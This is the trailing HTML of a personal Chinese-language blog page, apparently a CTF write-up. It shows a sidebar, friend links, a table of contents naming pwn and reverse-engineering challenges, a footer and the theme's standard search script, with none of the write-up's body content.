                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友链
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xi4or0uji.github.io/" title="Xi4or0uji" target="_blank">Xi4or0uji</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://gdufs-king.github.io/" title="V1ctor" target="_blank">V1ctor</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://z3r3f.gitee.io/" title="23r3f" target="_blank">23r3f</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://zszcr.github.io/" title="zs0zrc" target="_blank">zs0zrc</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://dittozzz.top/" title="ditto" target="_blank">ditto</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://ch4r1l3.github.io/" title="ch4r1l3" target="_blank">ch4r1l3</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://nightrainy.github.io/" title="知世" target="_blank">知世</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#pwn"><span class="nav-number">1.</span> <span class="nav-text">pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#your-pwn"><span class="nav-number">1.1.</span> <span class="nav-text">your_pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#先确定v4-0-的位置"><span class="nav-number">1.1.1.</span> <span class="nav-text">先确定v4[0]的位置</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#确定返回地址和要泄漏的真实地址跟v4-0-的偏移"><span class="nav-number">1.1.2.</span> <span class="nav-text">确定返回地址和要泄漏的真实地址跟v4[0]的偏移</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#获得onegadget地址"><span class="nav-number">1.1.3.</span> <span class="nav-text">获得onegadget地址</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#修改返回地址为onegadget"><span class="nav-number">1.1.4.</span> <span class="nav-text">修改返回地址为onegadget</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#baby-pwn"><span class="nav-number">1.2.</span> <span class="nav-text">baby_pwn</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#re"><span class="nav-number">2.</span> <span class="nav-text">re</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#easyGo"><span class="nav-number">2.1.</span> <span class="nav-text">easyGo</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">R4bb1t</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
